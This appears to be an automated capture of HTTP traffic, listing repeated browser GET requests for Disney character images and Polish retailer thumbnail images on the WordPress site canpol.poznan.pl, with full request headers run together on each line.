Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_mickey_mouse.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_winnie_the_pooh.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_minnie.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_frozen.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_thelion_guard.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_miles_from_tomorrow.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_sofia_the_first.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_descendans.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_fairs.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_cars.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/carefour_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_captain_jackie.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/tesco_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_mickey_mouse.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/mm_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/saturn_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/selgros_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/pepco_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_minnie.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_frozen.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_thelion_guard.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_miles_from_tomorrow.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/biedronka_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/makro_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/carefour_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/tesco_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/leclerc_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/intermarche_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/stokrotka_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/zabka_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/mm_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/saturn_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/selgros_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/pepco_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/smyk_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/makro_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/toysrus_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/biedronka_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/polomarket_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/auchan_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/img/transparent.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/wp-content/themes/salient/css/portfolio.css?ver=7.6Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/12/circles-1008411_1920-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/leclerc_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/intermarche_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/stokrotka_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/zabka_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
